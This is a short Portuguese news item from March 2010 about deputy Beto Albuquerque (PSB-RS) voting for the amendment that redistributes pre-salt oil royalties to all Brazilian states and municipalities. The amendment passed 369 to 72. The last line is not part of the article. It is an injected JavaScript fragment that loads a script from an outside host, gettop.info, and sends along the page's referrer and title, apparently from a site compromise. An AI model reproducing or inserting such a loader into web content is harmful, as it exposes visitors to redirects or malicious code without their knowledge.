Beto vota “sim” à distribuição de royalties para todos os Estados

Mar 10 2010
(0) Comments

Emenda foi aprovada em plenário às 22h25min desta quarta-feira FOTO AGÊNCIA CÂMARA

Ao votar “sim”, na noite desta quarta-feira (10), à emenda que redistribui os recursos dos royalties do pré-sal não destinados diretamente à União entre todos os Estados e Municípios de acordo com critérios dos fundos de participação o deputado federal Beto Albuquerque (PSB-RS) afirmou que votou com o Rio Grande do Sul e com o Brasil. “Todo o país patrocinou o crescimento da Petrobras. É justo que todos os Estados e Municípios recebam os royalties da exploração do petróleo”, afirmou o parlamentar gaúcho logo após a votação às 22h25min.

A emenda polêmica, de autoria dos deputados Ibsen Pinheiro (PMDB-RS) e Humberto Souto (PPS-MG), foi aprovada por 369 votos a favor e 72 contrários, com duas abstenções e faz parte do projeto que muda o marco regulatório para a exploração de petróleo na camada pré-sal alterando o modelo de concessão para partilha de produção, onde a União recebe diretamente parte da produção.

O projeto segue agora para o Senado, para onde já foram enviados os outros três textos que tratam do mesmo assunto.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;